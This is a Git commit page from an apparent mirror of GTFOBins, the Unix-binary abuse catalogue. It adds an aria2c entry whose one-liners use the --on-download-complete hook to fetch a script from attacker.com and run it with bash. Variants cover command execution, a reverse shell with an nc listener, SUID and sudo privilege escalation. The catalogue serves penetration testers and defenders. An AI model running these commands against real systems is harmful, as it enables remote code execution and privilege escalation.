public-mirrors/GTFOBins.github.io
1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io synced 2024-12-26 14:59:44 +01:00
Code Issues Projects Releases Wiki Activity

Add aria2c

Browse Source 
Taken from https://github.com/InsecurityAsso/inshack-2018/blob/master/web/curler/exploit/exploit
This commit is contained in:
HugoDelval 2018-09-07 11:53:15 +02:00
parent 8eaf595fe6
commit 214f7786c0
1 changed files with 13 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

13
_gtfobins/aria2c.md Normal file
View File

@ -0,0 +1,13 @@
---
functions:
execute-interactive:
- description: "By default the ``--on-download-complete`` option execute a given binary with 3 parameters: https://aria2.github.io/manual/en/html/aria2c.html?highlight=download%20complete#event-hook We can control the first one (GID) which leads to a command execution"
- code: "aria2c --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa # aaaaaaaaaaaaaaaa file contains a shell script"
reverse-shell-interactive:
- description: Run ``nc -lvp 12345`` on the attacker box to receive the shell.
- code: "aria2c --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa # aaaaaaaaaaaaaaaa file contains the reverse shell payload (in bash)"
suid-enabled:
- code: "./aria2c --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa"
sudo-enabled:
- code: "sudo aria2c --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa"
---